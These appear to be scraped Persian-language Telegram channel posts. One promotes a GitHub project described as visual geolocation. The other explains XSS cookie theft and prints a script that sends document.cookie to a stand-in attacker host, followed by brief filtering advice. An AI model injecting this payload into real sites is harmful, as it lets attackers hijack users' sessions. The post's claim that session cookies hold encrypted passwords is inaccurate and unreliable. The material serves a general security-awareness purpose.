🔸️این پروژه مسائل پیچیده «جهت‌یابی بصری» را با تقلید از عملکرد یک کارشناس حل می‌کند: عامل جزئیات عکس (معماری، تابلوهای راهنمایی، چشم‌انداز) را تحلیل کرده و از جستجوی وب برای بررسی فرضیات استفاده می‌کند.

📌لینک گیت‌هاب
https://github.com/BlackSnufkin/LitterBox

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

💻 ؛XSS — دزدیدن کوکی در یک ثانیه از طریق سایت دیگر

یک آسیب‌پذیری که ۲۰ سال قدمت دارد، اما هنوز هم هکرها را به پنل‌های مدیریت در سراسر جهان راه می‌دهد.

🎯 ماهیت: هکر در سایت یک فرم یا پارامتری پیدا می‌کند که <script> را فیلتر نمی‌کند. کد خود را در آن قرار می‌دهد. قربانی صفحه را باز می‌کند — کد اجرا می‌شود.

مثال دزدیدن کوکی (کوکی جلسه، جایی که رمز عبور به صورت رمزنگاری شده ذخیره شده):

<script>
  fetch('http://хакер.ру/steal?cookie=' + document.cookie);
</script>

حالا هکر جلسه قربانی را دارد. کوکی را در مرورگر قرار می‌دهد — و بدون رمز عبور با حساب او وارد می‌شود.

🟢 حفاظت:
- کاراکترهای خاص را بررسی کنید (htmlspecialchars)

🛡@ir_c_a

Читать полностью…
Subscribe to a channel